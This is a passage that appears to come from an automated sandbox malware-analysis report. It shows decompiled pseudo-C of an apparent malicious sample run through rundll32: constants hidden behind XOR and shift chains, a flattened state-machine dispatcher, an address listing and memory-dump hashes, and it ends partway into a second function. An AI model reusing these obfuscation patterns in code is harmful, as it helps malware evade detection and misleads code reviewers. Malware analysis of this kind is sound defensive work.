                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				char _v1560;
                                                                                                                                                            				char _v1564;
                                                                                                                                                            				signed int _v1568;
                                                                                                                                                            				signed int _v1572;
                                                                                                                                                            				signed int _v1576;
                                                                                                                                                            				signed int _v1580;
                                                                                                                                                            				signed int _v1584;
                                                                                                                                                            				signed int _v1588;
                                                                                                                                                            				signed int _v1592;
                                                                                                                                                            				signed int _v1596;
                                                                                                                                                            				signed int _v1600;
                                                                                                                                                            				signed int _v1604;
                                                                                                                                                            				signed int _v1608;
                                                                                                                                                            				signed int _v1612;
                                                                                                                                                            				signed int _v1616;
                                                                                                                                                            				signed int _v1620;
                                                                                                                                                            				signed int _v1624;
                                                                                                                                                            				signed int _v1628;
                                                                                                                                                            				signed int _v1632;
                                                                                                                                                            				signed int _v1636;
                                                                                                                                                            				signed int _v1640;
                                                                                                                                                            				signed int _v1644;
                                                                                                                                                            				signed int _v1648;
                                                                                                                                                            				signed int _v1652;
                                                                                                                                                            				unsigned int _v1656;
                                                                                                                                                            				signed int _v1660;
                                                                                                                                                            				signed int _v1664;
                                                                                                                                                            				signed int _v1668;
                                                                                                                                                            				signed int _v1672;
                                                                                                                                                            				signed int _v1676;
                                                                                                                                                            				signed int _v1680;
                                                                                                                                                            				signed int _v1684;
                                                                                                                                                            				signed int _v1688;
                                                                                                                                                            				signed int _v1692;
                                                                                                                                                            				signed int _v1696;
                                                                                                                                                            				signed int _v1700;
                                                                                                                                                            				signed int _v1704;
                                                                                                                                                            				signed int _v1708;
                                                                                                                                                            				signed int _v1712;
                                                                                                                                                            				signed int _v1716;
                                                                                                                                                            				signed int _v1720;
                                                                                                                                                            				signed int _v1724;
                                                                                                                                                            				signed int _v1728;
                                                                                                                                                            				signed int _v1732;
                                                                                                                                                            				signed int _v1736;
                                                                                                                                                            				signed int _v1740;
                                                                                                                                                            				signed int _v1744;
                                                                                                                                                            				signed int _v1748;
                                                                                                                                                            				void* _t500;
                                                                                                                                                            				void* _t502;
                                                                                                                                                            				intOrPtr* _t509;
                                                                                                                                                            				void* _t513;
                                                                                                                                                            				signed int _t522;
                                                                                                                                                            				intOrPtr _t523;
                                                                                                                                                            				intOrPtr* _t524;
                                                                                                                                                            				signed int _t525;
                                                                                                                                                            				signed int _t526;
                                                                                                                                                            				signed int _t527;
                                                                                                                                                            				signed int _t528;
                                                                                                                                                            				signed int _t529;
                                                                                                                                                            				signed int _t530;
                                                                                                                                                            				signed int _t531;
                                                                                                                                                            				signed int _t532;
                                                                                                                                                            				signed int _t533;
                                                                                                                                                            				signed int _t534;
                                                                                                                                                            				signed int _t535;
                                                                                                                                                            				signed int _t536;
                                                                                                                                                            				signed int _t537;
                                                                                                                                                            				signed int _t538;
                                                                                                                                                            				signed int _t539;
                                                                                                                                                            				void* _t540;
                                                                                                                                                            				void* _t546;
                                                                                                                                                            				intOrPtr _t556;
                                                                                                                                                            				void* _t603;
                                                                                                                                                            				signed int _t605;
                                                                                                                                                            				signed int* _t609;
                                                                                                                                                            
                                                                                                                                                            				_t609 =  &_v1748;
                                                                                                                                                            				_v1648 = 0xded5e0;
                                                                                                                                                            				_v1648 = _v1648 >> 0xb;
                                                                                                                                                            				_v1648 = _v1648 | 0x3a1a97de;
                                                                                                                                                            				_v1648 = _v1648 ^ 0x3a1a9ff7;
                                                                                                                                                            				_v1608 = 0x6694ca;
                                                                                                                                                            				_v1608 = _v1608 | 0xdc2b4f48;
                                                                                                                                                            				_v1608 = _v1608 ^ 0x5c6fdfcb;
                                                                                                                                                            				_v1712 = 0x53f825;
                                                                                                                                                            				_v1712 = _v1712 >> 2;
                                                                                                                                                            				_v1712 = _v1712 ^ 0x4e440c95;
                                                                                                                                                            				_v1712 = _v1712 | 0x7235b0e7;
                                                                                                                                                            				_v1712 = _v1712 ^ 0x7e75f2fd;
                                                                                                                                                            				_v1632 = 0xc6d169;
                                                                                                                                                            				_v1568 = 0;
                                                                                                                                                            				_t603 = 0x9805d0a;
                                                                                                                                                            				_t525 = 0x52;
                                                                                                                                                            				_v1632 = _v1632 / _t525;
                                                                                                                                                            				_t526 = 0x67;
                                                                                                                                                            				_v1632 = _v1632 * 0x1e;
                                                                                                                                                            				_v1632 = _v1632 ^ 0x0048bcfb;
                                                                                                                                                            				_v1596 = 0x189afb;
                                                                                                                                                            				_v1596 = _v1596 >> 0xe;
                                                                                                                                                            				_v1596 = _v1596 ^ 0x000d7c1d;
                                                                                                                                                            				_v1724 = 0x4bfed1;
                                                                                                                                                            				_v1724 = _v1724 * 0x63;
                                                                                                                                                            				_v1724 = _v1724 * 0x55;
                                                                                                                                                            				_v1724 = _v1724 >> 1;
                                                                                                                                                            				_v1724 = _v1724 ^ 0x61069d5d;
                                                                                                                                                            				_v1580 = 0x401b2b;
                                                                                                                                                            				_v1580 = _v1580 + 0x7090;
                                                                                                                                                            				_v1580 = _v1580 ^ 0x00412b45;
                                                                                                                                                            				_v1672 = 0xbaa782;
                                                                                                                                                            				_v1672 = _v1672 / _t526;
                                                                                                                                                            				_v1672 = _v1672 << 2;
                                                                                                                                                            				_v1672 = _v1672 ^ 0x000e5528;
                                                                                                                                                            				_v1624 = 0x1efbce;
                                                                                                                                                            				_t527 = 0x4f;
                                                                                                                                                            				_v1624 = _v1624 / _t527;
                                                                                                                                                            				_v1624 = _v1624 ^ 0x000dc160;
                                                                                                                                                            				_v1572 = 0x9ef416;
                                                                                                                                                            				_t605 = 0x62;
                                                                                                                                                            				_v1572 = _v1572 / _t605;
                                                                                                                                                            				_v1572 = _v1572 ^ 0x00079814;
                                                                                                                                                            				_v1612 = 0x4efe15;
                                                                                                                                                            				_t528 = 0x43;
                                                                                                                                                            				_v1612 = _v1612 / _t528;
                                                                                                                                                            				_v1612 = _v1612 ^ 0x000e5446;
                                                                                                                                                            				_v1640 = 0x94326d;
                                                                                                                                                            				_t529 = 0x77;
                                                                                                                                                            				_v1640 = _v1640 / _t529;
                                                                                                                                                            				_t530 = 0x35;
                                                                                                                                                            				_v1640 = _v1640 / _t530;
                                                                                                                                                            				_v1640 = _v1640 ^ 0x000d83b8;
                                                                                                                                                            				_v1676 = 0x511d41;
                                                                                                                                                            				_t531 = 9;
                                                                                                                                                            				_v1676 = _v1676 * 0x76;
                                                                                                                                                            				_v1676 = _v1676 ^ 0xeef8e480;
                                                                                                                                                            				_v1676 = _v1676 ^ 0xcb952f57;
                                                                                                                                                            				_v1708 = 0x4e0a18;
                                                                                                                                                            				_v1708 = _v1708 ^ 0x2110c6ad;
                                                                                                                                                            				_v1708 = _v1708 | 0x4a7f48ac;
                                                                                                                                                            				_v1708 = _v1708 + 0xffff2cb4;
                                                                                                                                                            				_v1708 = _v1708 ^ 0x6b758b76;
                                                                                                                                                            				_v1732 = 0x7a6741;
                                                                                                                                                            				_t123 =  &_v1732; // 0x7a6741
                                                                                                                                                            				_v1732 =  *_t123 / _t531;
                                                                                                                                                            				_v1732 = _v1732 << 0xe;
                                                                                                                                                            				_v1732 = _v1732 << 7;
                                                                                                                                                            				_v1732 = _v1732 ^ 0x36245548;
                                                                                                                                                            				_v1700 = 0x42788;
                                                                                                                                                            				_t532 = 0x44;
                                                                                                                                                            				_v1700 = _v1700 / _t532;
                                                                                                                                                            				_v1700 = _v1700 | 0xce808109;
                                                                                                                                                            				_v1700 = _v1700 + 0xffff7a0f;
                                                                                                                                                            				_v1700 = _v1700 ^ 0xce88d2ed;
                                                                                                                                                            				_v1740 = 0x39c25c;
                                                                                                                                                            				_v1740 = _v1740 + 0xf71;
                                                                                                                                                            				_t533 = 0x75;
                                                                                                                                                            				_v1740 = _v1740 / _t533;
                                                                                                                                                            				_v1740 = _v1740 ^ 0xc60840fd;
                                                                                                                                                            				_v1740 = _v1740 ^ 0xc60d36f5;
                                                                                                                                                            				_v1716 = 0x2bcc6c;
                                                                                                                                                            				_v1716 = _v1716 + 0x97be;
                                                                                                                                                            				_v1716 = _v1716 >> 0xd;
                                                                                                                                                            				_v1716 = _v1716 ^ 0xcb020dbc;
                                                                                                                                                            				_v1716 = _v1716 ^ 0xcb05808e;
                                                                                                                                                            				_v1604 = 0x3f7ac0;
                                                                                                                                                            				_v1604 = _v1604 + 0xafc6;
                                                                                                                                                            				_v1604 = _v1604 ^ 0x0048c4ef;
                                                                                                                                                            				_v1576 = 0x9f011d;
                                                                                                                                                            				_v1576 = _v1576 ^ 0x8bb25c52;
                                                                                                                                                            				_v1576 = _v1576 ^ 0x8b2a60ae;
                                                                                                                                                            				_v1684 = 0xe4045e;
                                                                                                                                                            				_v1684 = _v1684 * 0x42;
                                                                                                                                                            				_v1684 = _v1684 * 0xc;
                                                                                                                                                            				_v1684 = _v1684 ^ 0xc16ccb70;
                                                                                                                                                            				_v1720 = 0x76be5;
                                                                                                                                                            				_v1720 = _v1720 >> 0xd;
                                                                                                                                                            				_v1720 = _v1720 * 0x3b;
                                                                                                                                                            				_v1720 = _v1720 + 0xffffaa4e;
                                                                                                                                                            				_v1720 = _v1720 ^ 0xfff1ea6d;
                                                                                                                                                            				_v1680 = 0x1fb4c3;
                                                                                                                                                            				_v1680 = _v1680 << 4;
                                                                                                                                                            				_v1680 = _v1680 << 0xc;
                                                                                                                                                            				_v1680 = _v1680 ^ 0xb4c6c556;
                                                                                                                                                            				_v1644 = 0xb0dbcd;
                                                                                                                                                            				_v1644 = _v1644 << 0xf;
                                                                                                                                                            				_v1644 = _v1644 << 0x10;
                                                                                                                                                            				_v1644 = _v1644 ^ 0x800a09c5;
                                                                                                                                                            				_v1600 = 0x1a67e8;
                                                                                                                                                            				_v1600 = _v1600 | 0xeb4b5744;
                                                                                                                                                            				_v1600 = _v1600 ^ 0xeb54c7c0;
                                                                                                                                                            				_v1652 = 0x1784b1;
                                                                                                                                                            				_v1652 = _v1652 >> 0xf;
                                                                                                                                                            				_v1652 = _v1652 << 6;
                                                                                                                                                            				_v1652 = _v1652 ^ 0x00082079;
                                                                                                                                                            				_v1660 = 0xec7770;
                                                                                                                                                            				_v1660 = _v1660 + 0xb190;
                                                                                                                                                            				_v1660 = _v1660 | 0x400c0cca;
                                                                                                                                                            				_v1660 = _v1660 ^ 0x40ee2104;
                                                                                                                                                            				_v1668 = 0xfc9259;
                                                                                                                                                            				_v1668 = _v1668 + 0xffffc6b7;
                                                                                                                                                            				_v1668 = _v1668 >> 0xe;
                                                                                                                                                            				_v1668 = _v1668 ^ 0x000f272a;
                                                                                                                                                            				_v1704 = 0xff7fae;
                                                                                                                                                            				_v1704 = _v1704 + 0xffff711f;
                                                                                                                                                            				_v1704 = _v1704 + 0xffff4b94;
                                                                                                                                                            				_v1704 = _v1704 | 0x5a3393fe;
                                                                                                                                                            				_v1704 = _v1704 ^ 0x5af53198;
                                                                                                                                                            				_v1616 = 0x130067;
                                                                                                                                                            				_t534 = 0x4e;
                                                                                                                                                            				_v1616 = _v1616 / _t534;
                                                                                                                                                            				_v1616 = _v1616 ^ 0x00057283;
                                                                                                                                                            				_v1628 = 0x10552;
                                                                                                                                                            				_v1628 = _v1628 + 0xf3cd;
                                                                                                                                                            				_v1628 = _v1628 + 0x9e6e;
                                                                                                                                                            				_v1628 = _v1628 ^ 0x00033ec8;
                                                                                                                                                            				_v1636 = 0x95cc92;
                                                                                                                                                            				_v1636 = _v1636 >> 0xf;
                                                                                                                                                            				_v1636 = _v1636 + 0x9761;
                                                                                                                                                            				_v1636 = _v1636 ^ 0x000e6713;
                                                                                                                                                            				_v1748 = 0xd7b406;
                                                                                                                                                            				_t535 = 0x31;
                                                                                                                                                            				_v1748 = _v1748 * 0x46;
                                                                                                                                                            				_v1748 = _v1748 << 1;
                                                                                                                                                            				_v1748 = _v1748 + 0x479a;
                                                                                                                                                            				_v1748 = _v1748 ^ 0x75ff50ef;
                                                                                                                                                            				_v1584 = 0xe29275;
                                                                                                                                                            				_v1584 = _v1584 * 0x6d;
                                                                                                                                                            				_v1584 = _v1584 ^ 0x607f0d3c;
                                                                                                                                                            				_v1664 = 0xc2b99a;
                                                                                                                                                            				_v1664 = _v1664 / _t605;
                                                                                                                                                            				_v1664 = _v1664 | 0xc7d1021c;
                                                                                                                                                            				_v1664 = _v1664 ^ 0xc7dc1815;
                                                                                                                                                            				_v1692 = 0xa5d2da;
                                                                                                                                                            				_v1692 = _v1692 * 0x17;
                                                                                                                                                            				_v1692 = _v1692 / _t535;
                                                                                                                                                            				_t536 = 0x23;
                                                                                                                                                            				_v1692 = _v1692 * 0x3a;
                                                                                                                                                            				_v1692 = _v1692 ^ 0x11a891cb;
                                                                                                                                                            				_v1656 = 0x680db3;
                                                                                                                                                            				_v1656 = _v1656 >> 6;
                                                                                                                                                            				_v1656 = _v1656 >> 5;
                                                                                                                                                            				_v1656 = _v1656 ^ 0x000507e8;
                                                                                                                                                            				_v1728 = 0x12970f;
                                                                                                                                                            				_v1728 = _v1728 + 0xffffbe66;
                                                                                                                                                            				_v1728 = _v1728 >> 6;
                                                                                                                                                            				_v1728 = _v1728 / _t536;
                                                                                                                                                            				_v1728 = _v1728 ^ 0x00053169;
                                                                                                                                                            				_v1620 = 0xa87d1b;
                                                                                                                                                            				_v1620 = _v1620 + 0xc3ba;
                                                                                                                                                            				_v1620 = _v1620 ^ 0x00a7b1ac;
                                                                                                                                                            				_v1736 = 0xb206b7;
                                                                                                                                                            				_v1736 = _v1736 ^ 0x6f4eb888;
                                                                                                                                                            				_t537 = 0x5d;
                                                                                                                                                            				_v1736 = _v1736 / _t537;
                                                                                                                                                            				_v1736 = _v1736 + 0x173b;
                                                                                                                                                            				_v1736 = _v1736 ^ 0x013191a0;
                                                                                                                                                            				_v1744 = 0xbf67a7;
                                                                                                                                                            				_t538 = 0x70;
                                                                                                                                                            				_v1744 = _v1744 / _t538;
                                                                                                                                                            				_v1744 = _v1744 | 0x1279871b;
                                                                                                                                                            				_v1744 = _v1744 ^ 0x04c3b9b8;
                                                                                                                                                            				_v1744 = _v1744 ^ 0x16b0fef0;
                                                                                                                                                            				_v1588 = 0x7bc48a;
                                                                                                                                                            				_v1588 = _v1588 << 7;
                                                                                                                                                            				_v1588 = _v1588 ^ 0x3de90636;
                                                                                                                                                            				_v1688 = 0x5dc5eb;
                                                                                                                                                            				_v1688 = _v1688 >> 0xb;
                                                                                                                                                            				_v1688 = _v1688 + 0xaf87;
                                                                                                                                                            				_t539 = 0x6c;
                                                                                                                                                            				_t522 = _v1568;
                                                                                                                                                            				_v1688 = _v1688 * 0x63;
                                                                                                                                                            				_v1688 = _v1688 ^ 0x004fac27;
                                                                                                                                                            				_v1696 = 0x311285;
                                                                                                                                                            				_v1696 = _v1696 << 0xb;
                                                                                                                                                            				_v1696 = _v1696 ^ 0x3061b352;
                                                                                                                                                            				_v1696 = _v1696 / _t539;
                                                                                                                                                            				_v1696 = _v1696 ^ 0x01b73771;
                                                                                                                                                            				_v1592 = 0x977507;
                                                                                                                                                            				_v1592 = _v1592 | 0xf9843f0d;
                                                                                                                                                            				_v1592 = _v1592 ^ 0xf99a58c3;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t540 = 0x5c;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L2:
                                                                                                                                                            						_t500 = 0x8167d85;
                                                                                                                                                            						do {
                                                                                                                                                            							L3:
                                                                                                                                                            							if(_t603 == 0x2c7b186) {
                                                                                                                                                            								E00371FD1(_v1688, _v1696, _v1592, _v1564);
                                                                                                                                                            								_t603 = 0xcf98960;
                                                                                                                                                            								goto L18;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t603 == 0x33b45b1) {
                                                                                                                                                            									_push(_v1680);
                                                                                                                                                            									_push(_v1720);
                                                                                                                                                            									_t502 = E0038DCF7(_v1684, 0x371080, __eflags);
                                                                                                                                                            									_pop(_t546);
                                                                                                                                                            									__eflags = E0037AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
                                                                                                                                                            									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
                                                                                                                                                            									E0037A8B0(_v1628, _t502, _v1636);
                                                                                                                                                            									_t609 =  &(_t609[0xf]);
                                                                                                                                                            									L18:
                                                                                                                                                            									_t500 = 0x8167d85;
                                                                                                                                                            									_t540 = 0x5c;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t603 == _t500) {
                                                                                                                                                            										_t509 = E0037F002(2 + E0037CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0037CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
                                                                                                                                                            										_t609 =  &(_t609[0xd]);
                                                                                                                                                            										__eflags = _t509;
                                                                                                                                                            										_t603 = 0x2c7b186;
                                                                                                                                                            										_v1568 = 0 | __eflags == 0x00000000;
                                                                                                                                                            										goto L1;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t603 == 0x9805d0a) {
                                                                                                                                                            											_push(_v1672);
                                                                                                                                                            											_push(_v1648);
                                                                                                                                                            											_push(_v1580);
                                                                                                                                                            											_push( &_v520);
                                                                                                                                                            											E003846BB(_v1596, _v1724);
                                                                                                                                                            											_t609 = _t609 - 0xc + 0x1c;
                                                                                                                                                            											_t603 = 0xc81d40c;
                                                                                                                                                            											while(1) {
                                                                                                                                                            												L1:
                                                                                                                                                            												_t540 = 0x5c;
                                                                                                                                                            												goto L2;
                                                                                                                                                            											}
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t603 == 0xaea35f7) {
                                                                                                                                                            												_t523 =  *0x393e10; // 0x0
                                                                                                                                                            												_t524 = _t523 + 0x1c;
                                                                                                                                                            												while(1) {
                                                                                                                                                            													__eflags =  *_t524 - _t540;
                                                                                                                                                            													if(__eflags == 0) {
                                                                                                                                                            														break;
                                                                                                                                                            													}
                                                                                                                                                            													_t524 = _t524 + 2;
                                                                                                                                                            													__eflags = _t524;
                                                                                                                                                            												}
                                                                                                                                                            												_t522 = _t524 + 2;
                                                                                                                                                            												_t603 = 0x33b45b1;
                                                                                                                                                            												goto L2;
                                                                                                                                                            											} else {
                                                                                                                                                            												_t618 = _t603 - 0xc81d40c;
                                                                                                                                                            												if(_t603 == 0xc81d40c) {
                                                                                                                                                            													_push(_v1612);
                                                                                                                                                            													_push(_v1572);
                                                                                                                                                            													_t513 = E0038DCF7(_v1624, 0x371020, _t618);
                                                                                                                                                            													E0038176B( &_v1040, _t618);
                                                                                                                                                            													_t556 =  *0x393e10; // 0x0
                                                                                                                                                            													_t403 = _t556 + 0x1c; // 0x1c
                                                                                                                                                            													_t404 = _t556 + 0x23c; // 0x23c
                                                                                                                                                            													E00381652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
                                                                                                                                                            													E0037A8B0(_v1604, _t513, _v1576);
                                                                                                                                                            													_t609 =  &(_t609[0xf]);
                                                                                                                                                            													_t603 = 0xaea35f7;
                                                                                                                                                            													while(1) {
                                                                                                                                                            														L1:
                                                                                                                                                            														_t540 = 0x5c;
                                                                                                                                                            														L2:
                                                                                                                                                            														_t500 = 0x8167d85;
                                                                                                                                                            														goto L3;
                                                                                                                                                            													}
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t603 - 0xcf98960;
                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                            						return _v1568;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}

















































































                                                                                                                                                            0x003902b0
                                                                                                                                                            0x003902b5
                                                                                                                                                            0x003902ba
                                                                                                                                                            0x003902c2
                                                                                                                                                            0x003902ce
                                                                                                                                                            0x003902d3
                                                                                                                                                            0x003902d9
                                                                                                                                                            0x003902e1
                                                                                                                                                            0x003902e9
                                                                                                                                                            0x003902f1
                                                                                                                                                            0x003902f9
                                                                                                                                                            0x00390305
                                                                                                                                                            0x00390308
                                                                                                                                                            0x0039030c
                                                                                                                                                            0x00390314
                                                                                                                                                            0x0039031c
                                                                                                                                                            0x00390324
                                                                                                                                                            0x0039032c
                                                                                                                                                            0x00390331
                                                                                                                                                            0x00390339
                                                                                                                                                            0x00390341
                                                                                                                                                            0x0039034c
                                                                                                                                                            0x00390357
                                                                                                                                                            0x00390362
                                                                                                                                                            0x0039036d
                                                                                                                                                            0x00390378
                                                                                                                                                            0x00390383
                                                                                                                                                            0x00390390
                                                                                                                                                            0x00390399
                                                                                                                                                            0x0039039d
                                                                                                                                                            0x003903a5
                                                                                                                                                            0x003903ad
                                                                                                                                                            0x003903b7
                                                                                                                                                            0x003903bb
                                                                                                                                                            0x003903c3
                                                                                                                                                            0x003903cb
                                                                                                                                                            0x003903d3
                                                                                                                                                            0x003903d8
                                                                                                                                                            0x003903dd
                                                                                                                                                            0x003903e5
                                                                                                                                                            0x003903ed
                                                                                                                                                            0x003903f2
                                                                                                                                                            0x003903f7
                                                                                                                                                            0x003903ff
                                                                                                                                                            0x0039040a
                                                                                                                                                            0x00390415
                                                                                                                                                            0x00390422
                                                                                                                                                            0x0039042a
                                                                                                                                                            0x0039042f
                                                                                                                                                            0x00390434
                                                                                                                                                            0x0039043c
                                                                                                                                                            0x00390444
                                                                                                                                                            0x0039044c
                                                                                                                                                            0x00390454
                                                                                                                                                            0x0039045c
                                                                                                                                                            0x00390464
                                                                                                                                                            0x0039046c
                                                                                                                                                            0x00390471
                                                                                                                                                            0x00390479
                                                                                                                                                            0x00390481
                                                                                                                                                            0x00390489
                                                                                                                                                            0x00390491
                                                                                                                                                            0x00390499
                                                                                                                                                            0x003904a1
                                                                                                                                                            0x003904b5
                                                                                                                                                            0x003904ba
                                                                                                                                                            0x003904c1
                                                                                                                                                            0x003904cc
                                                                                                                                                            0x003904d7
                                                                                                                                                            0x003904e2
                                                                                                                                                            0x003904ed
                                                                                                                                                            0x003904f8
                                                                                                                                                            0x00390503
                                                                                                                                                            0x0039050b
                                                                                                                                                            0x00390516
                                                                                                                                                            0x00390521
                                                                                                                                                            0x00390530
                                                                                                                                                            0x00390533
                                                                                                                                                            0x00390537
                                                                                                                                                            0x0039053b
                                                                                                                                                            0x00390543
                                                                                                                                                            0x0039054b
                                                                                                                                                            0x0039055e
                                                                                                                                                            0x00390565
                                                                                                                                                            0x00390570
                                                                                                                                                            0x00390580
                                                                                                                                                            0x00390584
                                                                                                                                                            0x0039058c
                                                                                                                                                            0x00390594
                                                                                                                                                            0x003905a1
                                                                                                                                                            0x003905ad
                                                                                                                                                            0x003905b6
                                                                                                                                                            0x003905b7
                                                                                                                                                            0x003905bb
                                                                                                                                                            0x003905c3
                                                                                                                                                            0x003905cb
                                                                                                                                                            0x003905d0
                                                                                                                                                            0x003905d5
                                                                                                                                                            0x003905dd
                                                                                                                                                            0x003905e5
                                                                                                                                                            0x003905ed
                                                                                                                                                            0x003905f8
                                                                                                                                                            0x003905fc
                                                                                                                                                            0x00390604
                                                                                                                                                            0x0039060f
                                                                                                                                                            0x0039061a
                                                                                                                                                            0x00390625
                                                                                                                                                            0x0039062d
                                                                                                                                                            0x00390642
                                                                                                                                                            0x00390647
                                                                                                                                                            0x0039064d
                                                                                                                                                            0x00390655
                                                                                                                                                            0x0039065d
                                                                                                                                                            0x00390669
                                                                                                                                                            0x0039066e
                                                                                                                                                            0x00390674
                                                                                                                                                            0x0039067c
                                                                                                                                                            0x00390684
                                                                                                                                                            0x0039068c
                                                                                                                                                            0x00390697
                                                                                                                                                            0x0039069f
                                                                                                                                                            0x003906aa
                                                                                                                                                            0x003906b2
                                                                                                                                                            0x003906b7
                                                                                                                                                            0x003906c4
                                                                                                                                                            0x003906c5
                                                                                                                                                            0x003906cc
                                                                                                                                                            0x003906d0
                                                                                                                                                            0x003906d8
                                                                                                                                                            0x003906e0
                                                                                                                                                            0x003906e5
                                                                                                                                                            0x003906f3
                                                                                                                                                            0x003906f7
                                                                                                                                                            0x003906ff
                                                                                                                                                            0x0039070a
                                                                                                                                                            0x00390715
                                                                                                                                                            0x00390720
                                                                                                                                                            0x00390720
                                                                                                                                                            0x00390722
                                                                                                                                                            0x00390723
                                                                                                                                                            0x00390723
                                                                                                                                                            0x00390723
                                                                                                                                                            0x00390728
                                                                                                                                                            0x00390728
                                                                                                                                                            0x0039072e
                                                                                                                                                            0x0039098a
                                                                                                                                                            0x00390991
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00390734
                                                                                                                                                            0x0039073a
                                                                                                                                                            0x003908ea
                                                                                                                                                            0x003908f3
                                                                                                                                                            0x003908fb
                                                                                                                                                            0x00390901
                                                                                                                                                            0x0039095c
                                                                                                                                                            0x00390967
                                                                                                                                                            0x0039096a
                                                                                                                                                            0x0039096f
                                                                                                                                                            0x00390993
                                                                                                                                                            0x00390995
                                                                                                                                                            0x0039099a
                                                                                                                                                            0x00390740
                                                                                                                                                            0x00390742
                                                                                                                                                            0x003908ca
                                                                                                                                                            0x003908d1
                                                                                                                                                            0x003908d4
                                                                                                                                                            0x003908d6
                                                                                                                                                            0x003908de

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Agz$DWK$E+A$g$pw
                                                                                                                                                            • API String ID: 0-1474679353
                                                                                                                                                            • Opcode ID: 816cdd9bbfe80e6fcd9310c753ced0d19cc44d79d14875bfd8de842d2d0864b0
                                                                                                                                                            • Instruction ID: 894efc6abd46acbac855cb636548397bb355bff41ac5a98f1c22f1ab48074607
                                                                                                                                                            • Opcode Fuzzy Hash: 816cdd9bbfe80e6fcd9310c753ced0d19cc44d79d14875bfd8de842d2d0864b0
                                                                                                                                                            • Instruction Fuzzy Hash: 0C32117250C3809FD369CF25C98AA8BFBF2BBC4748F10891DE19986261D7B59949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E0037F09B(void* __ecx) {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				char _v1560;
                                                                                                                                                            				char _v2080;
                                                                                                                                                            				char _v2600;
                                                                                                                                                            				signed int _v2604;
                                                                                                                                                            				signed int _v2608;
                                                                                                                                                            				signed int _v2612;
                                                                                                                                                            				signed int _v2616;
                                                                                                                                                            				signed int _v2620;
                                                                                                                                                            				signed int _v2624;
                                                                                                                                                            				signed int _v2628;
                                                                                                                                                            				signed int _v2632;
                                                                                                                                                            				signed int _v2636;
                                                                                                                                                            				signed int _v2640;
                                                                                                                                                            				signed int _v2644;
                                                                                                                                                            				signed int _v2648;
                                                                                                                                                            				signed int _v2652;
                                                                                                                                                            				signed int _v2656;
                                                                                                                                                            				signed int _v2660;
                                                                                                                                                            				signed int _v2664;
                                                                                                                                                            				signed int _v2668;
                                                                                                                                                            				signed int _v2672;
                                                                                                                                                            				signed int _v2676;
                                                                                                                                                            				signed int _v2680;
                                                                                                                                                            				signed int _v2684;
                                                                                                                                                            				signed int _v2688;
                                                                                                                                                            				signed int _v2692;
                                                                                                                                                            				signed int _v2696;
                                                                                                                                                            				signed int _v2700;
                                                                                                                                                            				signed int _v2704;
                                                                                                                                                            				signed int _v2708;
                                                                                                                                                            				signed int _v2712;
                                                                                                                                                            				signed int _v2716;
                                                                                                                                                            				signed int _v2720;
                                                                                                                                                            				signed int _v2724;
                                                                                                                                                            				signed int _v2728;
                                                                                                                                                            				signed int _v2732;
                                                                                                                                                            				signed int _v2736;
                                                                                                                                                            				signed int _v2740;
                                                                                                                                                            				signed int _v2744;
                                                                                                                                                            				signed int _v2748;
                                                                                                                                                            				signed int _v2752;
                                                                                                                                                            				signed int _v2756;
                                                                                                                                                            				signed int _v2760;
                                                                                                                                                            				signed int _v2764;
                                                                                                                                                            				signed int _v2768;
                                                                                                                                                            				signed int _v2772;
                                                                                                                                                            				signed int _t425;
                                                                                                                                                            				signed int _t443;
                                                                                                                                                            				signed int _t444;
                                                                                                                                                            				signed int _t445;
                                                                                                                                                            				signed int _t446;
                                                                                                                                                            				signed int _t447;
                                                                                                                                                            				signed int _t448;
                                                                                                                                                            				signed int _t449;
                                                                                                                                                            				signed int _t450;
                                                                                                                                                            				signed int _t451;
                                                                                                                                                            				signed int _t452;
                                                                                                                                                            				signed int _t453;
                                                                                                                                                            				signed int _t458;
                                                                                                                                                            				void* _t502;
                                                                                                                                                            				void* _t503;
                                                                                                                                                            				signed int* _t507;
                                                                                                                                                            
                                                                                                                                                            				_t507 =  &_v2772;
                                                                                                                                                            				_v2628 = 0x98f0ce;
                                                                                                                                                            				_v2628 = _v2628 >> 0xb;
                                                                                                                                                            				_v2628 = _v2628 ^ 0x00001337;
                                                                                                                                                            				_v2696 = 0x96ddc1;
                                                                                                                                                            				_v2696 = _v2696 + 0xffff0eed;
                                                                                                                                                            				_v2696 = _v2696 + 0xffffc9f2;
                                                                                                                                                            				_v2696 = _v2696 ^ 0x009155bb;
